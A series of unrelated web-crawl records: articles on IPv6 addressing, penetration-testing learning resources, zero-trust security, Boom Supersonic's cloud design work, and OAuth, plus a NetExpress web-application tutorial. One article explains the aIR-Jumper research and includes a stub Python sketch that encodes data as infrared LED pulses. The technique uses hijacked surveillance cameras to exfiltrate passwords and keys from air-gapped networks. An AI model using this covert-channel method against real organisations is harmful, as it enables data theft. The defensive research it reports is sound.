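print(ipaddress.ip_address("2001:0db8:0000:0000:0000:0000:0000:0001").compressed)  # 2001:db8::1
```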
Internet Protocol version 4 (IPv4) was the first publicly used version of the Internet Protocol. IPv4 was developed as a research project by the Defense Advanced Research Projects Agency (DARPA), a United States Department of Defense agency, before becoming the foundation for the Internet and the World Wide Web. IPv4 included an addressing system that used numerical identifiers consisting of 32 bits. These addresses are typically displayed in quad-dotted notation as decimal values of four octets, each in the range 0 to 255, or 8 bits per number. Thus, IPv4 provides an addressing capability of 2^32, or approximately 4.3 billion addresses. Address exhaustion was not initially a concern in IPv4, as this version was originally intended as a test of DARPA's networking concepts.

During the first decade of operation of the Internet, by the late 1980s, it became apparent that methods had to be developed to conserve address space. In the early 1990s, even after the redesign of the addressing system using a classless network model, it became clear that this would not suffice to prevent IPv4 address exhaustion, and that further changes to the Internet infrastructure were needed. The last unassigned top-level blocks of 16 million IPv4 addresses each were allocated in February 2011 by the Internet Assigned Numbers Authority (IANA) to the five regional Internet registries (RIRs). However, each RIR still has available address pools and is expected to continue with standard address allocation policies until one /8 Classless Inter-Domain Routing (CIDR) block remains. After that, only blocks of 1,024 addresses (/22) will be provided from the RIRs to a local Internet registry (LIR). As of September 2012, both the Asia-Pacific Network Information Centre (APNIC) and the Réseaux IP Européens Network Coordination Centre (RIPE NCC) had reached this stage.

On the Internet, data is transmitted as network packets. IPv6 specifies a new packet format, designed to minimize packet-header processing by routers. Because the headers of IPv4 packets and IPv6 packets are significantly different, the two protocols are not interoperable. Nonetheless, in most respects IPv6 is a conservative extension of IPv4. Most transport and application-layer protocols need little or no change to operate over IPv6; exceptions are application protocols that embed Internet-layer addresses, such as FTP and NTPv3, where the new address format may cause conflicts with existing protocol syntax.

The principal advantage of IPv6 over IPv4 is its larger address space. The length of an IPv6 address is 128 bits, compared with 32 bits in IPv4. The address space therefore has 2^128, or approximately 3.4×10^38 addresses – around 100 addresses for every molecule on the surface of the Earth, and nearly four /64 blocks for every square centimetre of the planet. What's more, the IPv4 address space is poorly allocated, with approximately 14% of all available addresses actually in use. While these numbers are large, it was not the goal of the designers of the IPv6 address space to ensure geographical saturation with usable addresses. Rather, the longer addresses simplify the allocation of addresses, enable efficient route aggregation, and allow the implementation of special addressing features. In IPv4, complex Classless Inter-Domain Routing (CIDR) methods were developed to make the best use of the small address space.
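The quad-dotted notation and the block sizes mentioned above (the 16-million-address top-level blocks and the /22 blocks now issued to LIRs) can be illustrated with the standard-library ipaddress module; the addresses below are documentation examples, not real allocations:

```python
# Sketch: IPv4 notation and CIDR block sizes from the text above.
import ipaddress

addr = ipaddress.ip_address("198.51.100.7")   # quad-dotted: four octets, each 0-255
print(addr.packed)                              # the underlying 32 bits (4 bytes)

print(ipaddress.ip_network("10.0.0.0/8").num_addresses)        # 16,777,216 -- a 16 million address block
print(ipaddress.ip_network("198.51.100.0/22").num_addresses)   # 1,024 -- the /22 blocks RIRs hand to LIRs
```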
The standard size of a subnet in IPv6 is 2^64 addresses – the square of the size of the entire IPv4 address space. Actual address space utilization will therefore be low in IPv6, but network management and routing efficiency are improved by the large subnet space and hierarchical route aggregation.

Renumbering an existing network for a new connectivity provider with different routing prefixes is a major effort with IPv4. With IPv6, however, changing the prefix announced by a few routers can in principle renumber an entire network, since the host identifiers (the least-significant 64 bits of an address) can be independently self-configured by a host.

Multicasting, the transmission of a packet to multiple destinations in a single send operation, is part of the base specification in IPv6. In IPv4 this is an optional, although commonly implemented, feature. IPv6 multicast addressing shares common features and protocols with IPv4 multicast, but also provides changes and improvements by eliminating the need for certain protocols. IPv6 does not implement broadcast, i.e. the transmission of a packet to all hosts on the attached link using a special broadcast address, and therefore does not define broadcast addresses. In IPv6, the same result can be achieved by sending a packet to the link-local all-nodes multicast group at address ff02::1, which is analogous to IPv4 multicast to address 224.0.0.1. IPv6 also provides for new multicast implementations, including embedding rendezvous-point addresses in an IPv6 multicast group address, which simplifies the deployment of inter-domain solutions. In IPv4 it is very difficult for an organization to obtain even one globally routable multicast group assignment, and the implementation of inter-domain solutions is arcane. Unicast address assignments by a local Internet registry for IPv6 have at least a 64-bit routing prefix, yielding the smallest subnet size available in IPv6 (also 64 bits). With such an assignment it is possible to embed the unicast address prefix into the IPv6 multicast address format, while still providing a 32-bit block – the least-significant bits of the address – or approximately 4.2 billion multicast group identifiers. Thus each user of an IPv6 subnet automatically has available a set of globally routable source-specific multicast groups for multicast applications.

IPv6 hosts can configure themselves automatically when connected to an IPv6 network using the Neighbor Discovery Protocol via Internet Control Message Protocol version 6 (ICMPv6) router discovery messages. When first connected to a network, a host sends a link-local router solicitation multicast request for its configuration parameters; routers respond to such a request with a router advertisement packet that contains Internet Layer configuration parameters. If IPv6 stateless address autoconfiguration is unsuitable for an application, a network may use configuration with the Dynamic Host Configuration Protocol version 6 (DHCPv6), or hosts may be configured manually using static methods. Routers present a special case of requirements for address configuration, as they are often sources of autoconfiguration information such as router and prefix advertisements. Stateless configuration of routers can be achieved with a special router renumbering protocol.
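The standard /64 subnet discussed above is simple to demonstrate with the ipaddress module; the /48 shown as the containing prefix is just an illustrative site-sized allocation, not a rule from the text:

```python
# Sketch: the standard IPv6 /64 subnet and its containing prefix, standard library only.
import ipaddress

print(2**32)    # ~4.3 billion IPv4 addresses in total
print(2**128)   # ~3.4e38 IPv6 addresses in total

subnet = ipaddress.ip_network("2001:db8:85a3:42::/64")
print(subnet.num_addresses)              # 18446744073709551616 == 2**64, one standard subnet
print(subnet.supernet(new_prefix=48))    # 2001:db8:85a3::/48, an illustrative larger allocation
```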
In IPv6, the packet header and the process of packet forwarding have been simplified. Although IPv6 packet headers are at least twice the size of IPv4 packet headers, packet processing by routers is generally more efficient, thereby extending the end-to-end principle of Internet design. Specifically:

- The packet header in IPv6 is simpler than that used in IPv4, with many rarely used fields moved to separate optional header extensions.
- IPv6 routers do not perform fragmentation. IPv6 hosts are required to either perform path MTU discovery, perform end-to-end fragmentation, or send packets no larger than the IPv6 default MTU size of 1280 octets.
- The IPv6 header is not protected by a checksum; integrity protection is assumed to be assured by both link-layer and higher-layer (TCP, UDP, and so on) error detection. UDP over IPv4 may actually have a checksum of 0, indicating no checksum; IPv6 requires UDP to carry its own checksum. Consequently, IPv6 routers do not need to recompute a checksum when header fields (such as the time to live (TTL) or hop count) change. This improvement may have been made less important by the development of routers that perform checksum computation at link speed using dedicated hardware, but it is still relevant for software-based routers.
- The TTL field of IPv4 has been renamed Hop Limit in IPv6, reflecting the fact that routers are no longer expected to compute the time a packet has spent in a queue.
- The IPv6 packet header has a fixed size (40 octets). Options are implemented as additional extension headers after the IPv6 header, which limits their size only by the size of an entire packet. The extension header mechanism makes the protocol extensible in that it allows future services for quality of service, security, mobility, and others to be added without a redesign of the basic protocol.

Without Internet protocols, the Internet cannot really work, which shows how integral they are to networking. It is therefore recommended that people who want a good future in the networking field learn more and more about these protocols. This knowledge doesn't just come in handy in practical life; one must also know it to clear certification tests.
<urn:uuid:7f8972ea-4798-460e-afed-7c162d257efd>
CC-MAIN-2022-40
https://www.examcollection.com/certification-training/ccna-ipv6-addressing-scheme-in-lan-wan-environment.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00268.warc.gz
en
0.909834
2,747
3.65625
4
What is Penetration Testing?

Penetration testing is a form of security assessment that tests a system, network, or software application with the objective of identifying security vulnerabilities. Penetration testing helps to assess the security posture of the target IT assets and their configurations. In short, penetration testing helps to identify potential loopholes that might be exploited by an attacker. There are multiple benefits to conducting penetration testing on an organization's systems, and there are different penetration testing approaches that can be taken, as described in our previous articles.

Into the world of Penetration Testing: Where to start?

For those who want to check out the field of penetration testing or just want a feel for what it looks like, we recommend free online platforms to brush up your skills in penetration testing and cybersecurity. There are different targets and penetration testing scopes (e.g. web, network, and mobile). It is recommended to start with the web because it is both familiar and the easiest entry point. Note that conducting penetration tests without permission and authorization is illegal, but there are platforms that permit the legal practice of pentesting. Besides free YouTube resources on problem solving across different hacking platforms, several gamified platforms are also available for beginners.

For more advanced learning, check out these other practice grounds:
- Hack the Box
- Root Me
- PortSwigger WebSecurity Academy
- Damn Vulnerable Web Application (DVWA)
- Buggy Web Application (bWAPP)
- OWASP WebGoat

Penetration Testing Security Tools

Below are commonly used operating systems and security tools for various technical assessments.

Other Useful Resources
- Infosec Institute Resource Center: A useful knowledge-sharing area that provides news, updates, security tips, and technical information for penetration testing.
- SecLists: SecLists is the security tester's companion. It is a collection of multiple lists used during security assessments. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, and web shells.
- SANS Cyber Security Blog: Get the latest updates and news on penetration testing from the SANS Institute.
- Offensive Security Cheat Sheet by Red Teaming Experiments: A combination of exploit code, network commands, and injection scripts that prove useful for penetration testing and red teaming.

Penetration Testing in a Structured Manner

If you are serious about pursuing the profession of a security practitioner, particularly as a penetration tester, it is important to provide consistent coverage and quality of work for every engagement. Below are some reference frameworks for learning standard methodology:
- NIST SP 800-115
- NSA IAM
- CESG CHECK
- CREST Tiger Scheme
- The Cyber Scheme
- PCI DSS
- ABS Penetration Testing Guidelines
- OWASP Top 10
- CWE Top 25 Most Dangerous Software Errors
- CREST Test Methodology

While executing a penetration test using a standardized methodology is important, we cannot emphasize enough the importance of being creative and curious and of thinking outside the box. Your goal as a penetration tester is to find vulnerabilities and loopholes; that's why asking "what if" and "why" questions is critical to identifying scenarios beyond the imagination of developers and architects.
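Hands-on practice should only ever happen against targets you are explicitly authorized to test, such as the platforms listed above or your own lab. With that caveat, a first taste of what scanning tools do under the hood can be as small as the following TCP connect check; it is a deliberately minimal, illustrative stand-in for real scanners, and the target and port list are placeholders.

```python
# Minimal TCP connect "port check" sketch -- only ever run this against systems you
# are explicitly authorized to test (e.g. your own lab VMs or platforms that permit it).
import socket

def check_port(host: str, port: int, timeout: float = 1.0) -> bool:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0   # 0 means the TCP handshake succeeded

target = "127.0.0.1"   # placeholder: substitute an authorized lab target
for port in (22, 80, 443, 8080):
    state = "open" if check_port(target, port) else "closed/filtered"
    print(f"{target}:{port} {state}")
```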
Want to meet and be connected to other security professionals like you? Check out Infosec Conferences for the latest events in cybersecurity.
<urn:uuid:ddfea668-197a-48e7-b932-17e627f890bc>
CC-MAIN-2022-40
https://www.horangi.com/blog/pentesting-tools-and-resources-to-get-you-started
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00268.warc.gz
en
0.888403
743
2.875
3
Traditionally, companies worked on a castle-and-moat security principle. In this model, it is not easy to obtain access to an application from outside the network, but anyone inside the network is considered a trusted source by default. The issue with this system was that once anyone gained access to the network, the attacker could easily access all data. This vulnerability has grown because companies no longer store their data in a single place: data is usually spread across multiple cloud vendors, which makes it harder for security teams to control the whole network. Thus the requirement for zero-trust security arose. It offers multiple lines of defense, and it also provides reduced complexity and more business value.

Understanding zero trust security

Zero trust security for businesses is an IT network security model that requires verification of identity for every device or person trying to place an access request on a network. This applies to every person requesting access, whether inside or outside the network. It is a holistic approach where only authorized devices and users can access data and applications, protecting applications from hackers and preventing data theft. Compared with the original security model, stronger identification of users and devices, restricted access to data, and secure data transfer and storage are some of the primary advantages of zero-trust security.

Working of zero trust security system

The basic principle behind zero-trust security for businesses is the assumption that attackers can be inside or outside the network. Thus, no machines or users are automatically trusted by the system. Another fundamental feature of the model is the least-privilege access rule: a user gets only the access they need, on a need-to-know basis. Not every user who submits an access request can reach the sensitive parts of the application, so confidential data remains safe.

The main issue with this new approach is how to implement zero trust for a business. Since the workflow of every business is different, a single system cannot be used by all. Microsegmentation is utilized in zero-trust security networks. It is the process of breaking the various security perimeters into smaller zones in order to maintain access rules for individual parts of the network. Ideally, a network containing sensitive data files and working on the above principle will contain several separate and secure zones. A user with access to only one of those zones will be unable to access the other zones without authorization for them.

Multi-factor authentication, or MFA, is another fundamental aspect of zero-trust security for businesses. It simply means that a user requires more than one piece of evidence for authentication. Multiple popular online platforms like Google have incorporated MFA into their workflow; as of 2017, more than 60 percent of enterprise organizations had adopted MFA.

Lastly, there are strict restrictions on device access. Zero-trust systems keep track of how many devices are trying to access the network, and which ones, and ensure that every device has proper authorization. Thus, the network's attack surface is reduced considerably.
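The following toy sketch pulls the ideas above together: every request is verified (MFA and device posture), and least-privilege zone membership is checked on each access. The attributes, users, and rules are invented purely for illustration; real deployments rely on identity providers, device management, and network microsegmentation rather than application code like this.

```python
# Toy illustration of zero-trust style, per-request access decisions.
# Every request is evaluated; nothing is trusted just for being "inside" the network.
# The attributes and rules below are invented for demonstration only.
from dataclasses import dataclass

@dataclass
class AccessRequest:
    user: str
    mfa_verified: bool
    device_compliant: bool
    zone: str            # microsegment the resource lives in

# Least-privilege: each user is granted only the zones they need
ALLOWED_ZONES = {
    "alice": {"hr-records"},
    "bob": {"billing"},
}

def authorize(req: AccessRequest) -> bool:
    if not (req.mfa_verified and req.device_compliant):
        return False                       # verify identity and device on every request
    return req.zone in ALLOWED_ZONES.get(req.user, set())

print(authorize(AccessRequest("alice", True, True, "hr-records")))   # True
print(authorize(AccessRequest("alice", True, True, "billing")))      # False (not her zone)
print(authorize(AccessRequest("bob", False, True, "billing")))       # False (no MFA)
```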
While there are no immediate disadvantages to zero-trust security models, especially for small businesses, setting up the system is complex and time-consuming. It involves defining the different kinds of users, devices, applications, and so on, followed by defining the information each should be allowed to access. Setting up and defining the boundaries becomes challenging in a world where more data is stored on cloud systems.

Making the perfect zero trust road map

Adopting the right zero-trust road map helps businesses realize the benefits of zero trust architecture. This security approach focuses on reducing the potential for time-consuming, costly data breaches that not only cause data leaks but also slow a company's momentum in the market. Small businesses can adopt the following strategies when planning their zero-trust road map, to minimize the potential attack surface and hasten threat detection.

Zero trust security for businesses can be established easily by using multifactor authentication for every user and partner account. According to a report by Centrify, even though more than 70 percent of threats and breaches involve privileged access, many business owners don't adopt the model despite being well aware of its benefits. Vaulting the credentials of shared accounts minimizes the risk of a data breach due to rash usage of privileged access. Password vaults are mandatory for any business that relies on source code under development, proprietary data, patents, and intellectual property (IP). These assets are critical to the growth of a company using a zero-trust strategy.

Secured remote access

To reduce potential breaches, businesses should focus on devising a system that gives limited access to the remote workforce, i.e., employees from different departments only have access to the data they specifically work with.

Real-time audits and monitoring

Implementing zero trust security for businesses also involves adding a supporting system that keeps a check on the ongoing workflow, immediately pinpointing the start of any security incident. The data from these audits can also be used to identify privileged credential use.

Privileged access credentials

Another common mistake made by small businesses is keeping the preset passwords for data protection in most applications. Preset passwords are not only weak but also well known, and they can be a weak point for hackers.

Having implemented zero-trust cybersecurity protocols, organizations can enhance the security models required to safeguard their applications, resources, and confidential data. In today's world of distributed computer systems, zero-trust protocols can offer several business benefits as well. Organizations can improve the user interface and user experience and successfully migrate their applications to a cloud system. Beyond the UI advantages, the cybersecurity system will reduce the time to detect data breaches and increase the visibility of the enterprise. The additional layer of data and application protection will improve brand perception and reduce the considerable financial losses caused by security breaches. Thus, migrating to zero-trust security protocols will benefit the firms implementing them.

Originally published at ITProPortal
<urn:uuid:d476b3fc-1b24-4cf7-8f14-83794608e446>
CC-MAIN-2022-40
https://guptadeepak.com/how-businesses-are-making-way-for-zero-trust/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00268.warc.gz
en
0.940059
1,292
2.9375
3
Cloud computing typically has nothing to do with real clouds in the atmosphere, but that's not the case with Boom Supersonic. In building a new generation of supersonic commercial jet aircraft, Denver-based Boom Supersonic is making extensive use of the cloud for design and test.

In a session at the Amazon Web Services (AWS) re:Invent conference earlier this month, Blake Scholl (pictured), founder and CEO of Boom, outlined how his company is using the cloud to design and build an aircraft that provides supersonic air travel that would be cost-prohibitive using other means. Scholl is no stranger to Amazon, having worked for the company as a software engineer from 2001 until 2006. In 2014, he founded Boom Supersonic with the vision that it was possible and cost-effective to build a supersonic aircraft that could reduce the time to traverse the globe. Commercial supersonic air travel hasn't been available since 2003, when the Concorde jet was retired by British Airways and Air France.

"So what does a revolution in high-performance computing have to do with a revolution in high-performance aircraft?" Scholl asked rhetorically during his AWS session. "What does cloud computing have to do with how we fly through actual clouds?" Scholl answered his own question by explaining how the cloud is the key to cost-efficiently building a sustainable supersonic jet that could one day revolutionize air travel.

Reducing Travel Time with the Cloud

Boom's mission is to make the world more accessible. Scholl noted that for the past 60 years it has taken nine hours for a commercial flight to fly from Seattle to Tokyo. By the end of the decade, his goal is that millions of everyday travelers will be enjoying the benefits of supersonic flight aboard a Boom Overture jet that is twice as fast as any aircraft flying today. That means that Tokyo will be just four and a half hours from Seattle and London will be just three and a half hours from New York. "Speed unlocks new possibilities for human relationships and business connections," he said.

Cloud Computing at Supersonic Jet Speed

For most of aviation history, aircraft were designed on paper with scale models that were built and tested in wind tunnels, Scholl said. That process is slow and costly and to date hasn't benefited as much as it should from cloud computing advancements. "Today to design a faster airplane, we need the fastest computers and computational methods," he said. "Leveraging AWS saved us literally years and millions of dollars because we can now test many designs quickly and inexpensively, and as such we can deliver a better airplane."

Boom's first jet is the experimental XB-1 that was rolled out in October. When designing the XB-1, Boom made use of AWS high-performance computing (HPC) cloud clusters that typically had 500 or more compute cores. Hundreds of possible airplane designs flew through virtual wind tunnel tests, encompassing thousands of scenarios, according to Scholl. "Because AWS allowed us to run many hundreds of these simulations concurrently, we achieved a sixfold increase in team productivity," he said. "Simply put, without AWS today, we would be looking at a sketch of a future airplane concept, not an assembled jet, because years of design work would still remain."

The Boom Overture Supersonic Jet and the Cloud

The XB-1 is a critical stepping stone for Boom's ultimate goal: the Overture jet, which is intended to be a commercially viable supersonic aircraft.
Scholl said 525 terabytes of XB-1 design and test data are already on AWS, and he expects that Boom will generate petabytes of data as it progresses through the development of the Overture jet. "Because AWS lets us put compute next to data, we can run models across our dataset, gaining actionable insights," he said. "For example, we're using machine learning to calibrate simulations for wind tunnel results, accelerating model convergence and allowing us to deliver a more optimized aircraft." To date, Boom has used 53 million core hours of compute at AWS to design and test the XB-1, and Scholl expects to use more than 100 million core hours as it finalizes the design for the Overture airliner. "Think of how many industries AWS has already transformed, and today supersonic flight is one of those surprising benefits of computing," he said. "Just as AWS is reinventing computing, at Boom, we're reinventing travel."
<urn:uuid:b706d838-d093-48ae-a2dd-5f5311edbbe3>
CC-MAIN-2022-40
https://www.datacenterknowledge.com/amazon/how-cloud-computing-reinventing-supersonic-air-travel
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00268.warc.gz
en
0.963863
930
2.578125
3
OAuth, also known as Open Authorization, is an open standard authorization framework for token-based authorization on the internet. OAuth enables an end-user's account information to be used by third-party services, such as Facebook and Google, without exposing the user's account credentials to the third party. It acts as an intermediary on behalf of the end-user, providing the third-party service with an access token that authorizes specific account information to be shared. The process for obtaining the token is called an authorization flow; a minimal sketch of that flow appears below.

OAuth 1.0 was first released in 2007 as an authorization method for the Twitter Application Program Interface (API). In 2010, the IETF OAuth Working Group published the first draft of the OAuth 2.0 protocol. Like the original OAuth, OAuth 2.0 provides users with the ability to grant third-party applications access to web resources without sharing a password. However, it is a completely new protocol and is not backward compatible with OAuth 1.0. Updated features include a new authorization code flow to accommodate mobile applications, simplified signatures, and short-lived tokens with long-lived authorizations. This gives end-users the ability to revoke tokens more easily when desired.

OAuth is often used to consolidate user credentials and streamline the login process, so that when users access an online service, they don't have to re-enter information that other online accounts already hold. OAuth is the underlying technology used for website authentication by sites that let users register or log in using their account with another website such as Facebook, Twitter, LinkedIn, Google, GitHub, or Bitbucket. For example, if a user clicks the Facebook login option when logging into another website, Facebook authenticates them, and the original website logs them in using permission obtained from Facebook.
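Here is a minimal sketch of the OAuth 2.0 authorization code flow described above. The endpoints, client ID, secret, and redirect URI are placeholders rather than any real provider's values, so treat it as an outline of the steps, not a drop-in integration.

```python
# Minimal sketch of the OAuth 2.0 authorization code flow. All URLs and credentials
# below are placeholders; consult your identity provider's documentation for the
# actual endpoints, scopes, and parameters.
import secrets
from urllib.parse import urlencode

import requests  # third-party package: pip install requests

AUTHORIZE_URL = "https://auth.example.com/oauth/authorize"   # placeholder
TOKEN_URL = "https://auth.example.com/oauth/token"           # placeholder
CLIENT_ID = "my-client-id"                                    # placeholder
CLIENT_SECRET = "my-client-secret"                            # placeholder
REDIRECT_URI = "https://myapp.example.com/callback"           # placeholder

# Step 1: send the user's browser to the provider to authenticate and consent.
state = secrets.token_urlsafe(16)   # protects the callback against CSRF
login_url = AUTHORIZE_URL + "?" + urlencode({
    "response_type": "code",
    "client_id": CLIENT_ID,
    "redirect_uri": REDIRECT_URI,
    "scope": "profile email",
    "state": state,
})
print("Redirect the user to:", login_url)

# Step 2: the provider redirects back to REDIRECT_URI with ?code=...&state=...
# After verifying that `state` matches, exchange the short-lived code for tokens.
def exchange_code(code: str) -> dict:
    resp = requests.post(TOKEN_URL, data={
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": REDIRECT_URI,
        "client_id": CLIENT_ID,
        "client_secret": CLIENT_SECRET,
    }, timeout=10)
    resp.raise_for_status()
    return resp.json()   # typically contains access_token, expires_in, maybe refresh_token
```

The access token returned in the final step is what the third-party service presents instead of the user's password, which is exactly the credential-sparing behaviour described above.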
Blissfully is one excellent example of a platform that can do all three and more; it’s a key SaaS security element when putting your IT stack together. Manage SaaS Access & Passwords – Some SaaS applications cannot tie into SSO solutions as mentioned previously. For these situations, CyberHoot recommends using a Password Manager. Reputable Password Managers such as LastPass, 1Password, DashLane, or Bitwarden allow users to generate strong, unique 14+ character passwords, store credentials for websites and store encrypted Secure Notes. These tools are also valuable as they allow users to securely share credentials or notes with trusted employees or clients. Practical advice and common sense apply here. Make sure your users know not to blindly accept all the access permissions requested by a SaaS application no differently than denying a phone app access to your contact list or denying access to your location data by default. If it doesn’t need the access to function fundamentally, your default position should always be to deny access. CyberHoot’s Minimum Essential Cybersecurity Recommendations The following recommendations will help you and your business stay secure with the various threats you may face on a day-to-day basis. All of the suggestions listed below can be gained by hiring CyberHoot’s vCISO Program development services. - Govern employees with policies and procedures. You need a password policy, an acceptable use policy, an information handling policy, and a written information security program (WISP) at a minimum. - Train employees on how to spot and avoid phishing attacks. Adopt a Learning Management system like CyberHoot to teach employees the skills they need to be more confident, productive, and secure. - Test employees with Phishing attacks to practice. CyberHoot’s Phish testing allows businesses to test employees with believable phishing attacks and put those that fail into remedial phish training. - Deploy critical cybersecurity technology including two-factor authentication on all critical accounts. Enable email SPAM filtering, validate backups, and deploy DNS protection, antivirus, and anti-malware on all your endpoints. - In the modern Work-from-Home era, make sure you’re managing personal devices connecting to your network by validating their security (patching, antivirus, DNS protections) or prohibiting their use entirely. - If you haven’t had a risk assessment by a 3rd party in the last 2 years, you should have one now. Establishing a risk management framework in your organization is critical to addressing your most egregious risks with your finite time and money. - Buy Cyber-Insurance to protect you in a catastrophic failure situation. Cyber-Insurance is no different than Car, Fire, Flood, or Life insurance. It’s there when you need it most. Each of these recommendations, except cyber-insurance, is built into CyberHoot’s product and virtual Chief Information Security Officer services. With CyberHoot you can govern, train, assess, and test your employees. Visit CyberHoot.com and sign up for our services today. At the very least continue to learn by enrolling in our monthly Cybersecurity newsletters to stay on top of current cybersecurity updates. To learn more about how OAuth works, watch this short 2-minute video: CyberHoot does have some other resources available for your use. 
Below are links to all of our resources, feel free to check them out whenever you like: - Cybrary (Cyber Library) - Press Releases - Instructional Videos (HowTo) – very helpful for our SuperUsers! Note: If you’d like to subscribe to our newsletter, visit any link above (besides infographics) and enter your email address on the right-hand side of the page, and click ‘Send Me Newsletters’.
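To make the authorization flow described above concrete, here is a minimal sketch of the OAuth 2.0 authorization code flow from a client application's point of view. It uses the third-party requests library, and every endpoint URL, client credential, and scope value below is a placeholder assumption rather than any real provider's API, so treat it as an illustration of the token exchange, not a production implementation.

```python
import secrets
from urllib.parse import urlencode

import requests  # third-party: pip install requests

# Placeholder values -- a real provider publishes its own endpoints and
# issues the client ID/secret when you register your application.
AUTHORIZE_URL = "https://auth.example.com/oauth/authorize"
TOKEN_URL = "https://auth.example.com/oauth/token"
CLIENT_ID = "my-client-id"
CLIENT_SECRET = "my-client-secret"
REDIRECT_URI = "https://myapp.example.com/callback"


def build_authorization_url() -> tuple[str, str]:
    """Step 1: send the user's browser to the provider's consent page.

    The 'state' value is random and must be checked on the callback
    to prevent cross-site request forgery.
    """
    state = secrets.token_urlsafe(16)
    params = {
        "response_type": "code",   # authorization code flow
        "client_id": CLIENT_ID,
        "redirect_uri": REDIRECT_URI,
        "scope": "profile email",  # request only the access you need
        "state": state,
    }
    return f"{AUTHORIZE_URL}?{urlencode(params)}", state


def exchange_code_for_token(code: str) -> dict:
    """Step 2: after the user consents, the provider redirects back with
    a short-lived code; the client swaps it for an access token."""
    resp = requests.post(
        TOKEN_URL,
        data={
            "grant_type": "authorization_code",
            "code": code,
            "redirect_uri": REDIRECT_URI,
            "client_id": CLIENT_ID,
            "client_secret": CLIENT_SECRET,
        },
        timeout=10,
    )
    resp.raise_for_status()
    return resp.json()  # typically contains access_token, expires_in, ...
```

Notice that the user's password never passes through the client application: the provider authenticates the user and hands back only a revocable token. That is the property that makes OAuth attractive, and also why the token itself must be guarded carefully.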
Organizations protect their internal networks from internet attacks by using firewalls, intrusion detection systems (IDSs), and intrusion prevention systems (IPSs). For a higher degree of protection, so-called 'air-gap' isolation is used. Security researchers from Ben-Gurion University of the Negev (BGU) introduced a new covert channel that uses infrared light and surveillance cameras as a communication channel, which they named aIR-Jumper.

Targeting air-gapped computers

Air-gapped computers first need to be compromised with malware, either through social engineering methods or by using insiders. Once deployed, the malware searches for surveillance cameras using open ports, IP addresses, and MAC header responses. Once the network is mapped, the malware tries to connect with the cameras, either by stealing passwords from the computer or by exploiting a vulnerability, in order to control the IR LEDs. The researchers published a PoC explaining the technical details.

Data exfiltration and infiltration – surveillance cameras

In the exfiltration scenario, malware present inside the organization can reach the surveillance cameras across the local network and control the IR illumination. Sensitive data such as PIN codes, passwords, and encryption keys is then modulated, encoded, and transmitted over the IR signals. An attacker sitting in the line of sight can capture these IR signals and decode them. Many surveillance and security cameras monitor public areas, which allows attackers to easily establish a line of sight with them.

The researchers said: "For testing and evaluation, we executed a program which encodes a binary file and transmits it by means of the IR LEDs. The program catches the camera's IP, the encoding along with the IR intensities' (amplitudes) timing parameters and the binary file to transmit."

In the infiltration scenario, an attacker standing in a public area uses IR LEDs to send hidden signals to the surveillance camera(s). Binary data such as command and control (C&C) and beacon messages are encoded on top of the IR signals. The signals hidden in the video stream are then intercepted and decoded by the malware residing on the network. Exfiltration and infiltration can be combined to establish bidirectional, 'air-gap' communication between the compromised network and the attacker. Since surveillance cameras can receive light in the IR wavelength, it is conceivable to deliver data into the organization through the video stream recorded by the surveillance cameras, using covert IR signals.

Detection and countermeasures

Detection can be done at the network level by deep packet inspection, by monitoring the network traffic from hosts in the network to the surveillance cameras. Disabling the IR LEDs in the surveillance cameras may prevent the exfiltration channel presented here. The infiltration channel can be prevented by adding an IR filter to the surveillance camera.
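To see how little machinery such a covert channel needs, here is a simplified, hypothetical sketch of the on-off keying idea in Python. It is not the researchers' actual PoC: the set_ir_led function is a stand-in for whatever camera API would control the illuminator, and the timing value is invented purely for illustration.

```python
import time

BIT_DURATION = 0.5  # seconds per bit; a made-up value for illustration


def set_ir_led(on: bool) -> None:
    """Stand-in for whatever camera API controls the IR illuminator.
    Here we just print the state instead of driving real hardware."""
    print("IR LED", "ON" if on else "OFF")


def transmit(payload: bytes) -> None:
    """Encode each byte MSB-first as on/off intervals (on-off keying)."""
    for byte in payload:
        for i in range(7, -1, -1):
            bit = (byte >> i) & 1
            set_ir_led(bool(bit))
            time.sleep(BIT_DURATION)
    set_ir_led(False)  # return to the idle state when done


# A receiver in line of sight would sample the LED brightness in the
# camera's video feed at the same interval and rebuild the bytes.
transmit(b"PIN:1234")
```

A real implementation would need synchronization preambles, error correction, and careful timing calibration; the point is only that a one-bit light source plus a clock is enough to leak data to anyone in the camera's line of sight.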
In this and the next session you create a Web application. In this session, you use HTML Page Wizard and Form Designer to create the user interface, and then use Internet Application Wizard to create the program to process the data. You use the IDE, your Web browser, and Solo, the Web server software included in NetExpress, to run the application and see the appearance of the interface. In the next session, Completing and Running Your Web Application, you add the business logic to the program and run the complete application.

You need to have read the chapter Start Here for the Tutorials, worked through the first session Using NetExpress, and read the chapter Introduction to Web Applications before you do this session.

You use HTML Page Wizard to create forms for display on a Web browser. These are the user interface to your application. From within this Wizard, you enter Form Designer, where you design and edit the forms' layout. You use Internet Application Wizard to generate a server-side COBOL program to handle the forms.

With an HTML form you can specify the order of the controls, but the exact layout is normally determined by the browser that displays it. However, Form Designer gives you facilities to specify the layout exactly.

The server-side program is central to a Web application. It accepts data from an input form, and outputs data in one or more output forms. A special case is where there's just one form, used for both input and output. This is the kind of application we create in this session.

If you have closed NetExpress, open it as before. If any project window or other windows are open, close them. In this sample session you:

You could start by creating a project in the way described in the chapter Using NetExpress, but if you go straight ahead and create the form, NetExpress will give you an opportunity to create the project. To create a form:

The project window for the project appears. So does the first page of the HTML Page Wizard.

Normally, when you design an HTML form, you can specify only the order of the objects you put on it. Their exact positions are determined by the browser used to view the form. However, in NetExpress you can specify that part of your form is a positional form. Objects within this will be placed exactly where you put them. By clicking Positional Form.htm here, you choose that the form will contain one positional form, covering most of its area. Remember that in Web terminology a Web page that contains fields for a user to fill in is called a form. Do not confuse this with the positional form within it.

This specifies that your HTML form will be called mypage.htm. The normal extension for HTML files is .htm.

